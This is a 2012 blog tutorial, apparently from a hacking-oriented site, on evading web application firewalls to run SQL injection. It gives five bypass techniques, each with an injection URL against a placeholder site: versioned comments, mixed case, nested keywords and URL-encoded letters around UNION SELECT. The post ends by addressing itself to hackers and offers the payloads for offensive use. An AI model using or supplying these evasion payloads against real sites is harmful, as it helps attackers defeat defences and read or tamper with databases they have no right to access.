Pages

Tuesday, November 6, 2012

Basic WAF Bypassing Methods

 




Today I am going to show you how to bypass Web Application Firewalls (WAF). I will demonstrate from the Simplest and most Basic Techniques !

 


NOTE: SQL Injection is not demonstrated here! If you don’t know SQL Injection, read this first… 


 What is WAF?


WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!


How to know if there is a Web Application Firewall?


This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).


Example:


http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….

                                                 Error !!!!!!!!!!!!


Basic/Simple Methods:


First, of course, we need to know the Basic Methods to bypass WAF…


1) Comments:

     

You can use comments to bypass WAF:


   http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

                                        (First Method that can Bypass WAF)


However, most WAF identify this method so they still show a “Forbidden Error…"


2) Change the Case of the Letters:


You can also change the Case of the Command:

 http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
                                         

                                            (Another Basic Method to Bypass WAF!)

 However, as before, this trick is also detected by most WAF! 


3) Combine the previous Methods:


What you can also do is to combine the previous two methods:

 http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!


4) Replaced Keywords:


Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function

 

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

        

 (The “union” and the “select” will be removed, so the final result will be: “UNION SELECT”)

  This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!


5) Inline Comments:


Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

 

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

                                 (The %55 is equal to “U” and %53 to “S”)

 

 I hope this post is very useful to all the hacker.



Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)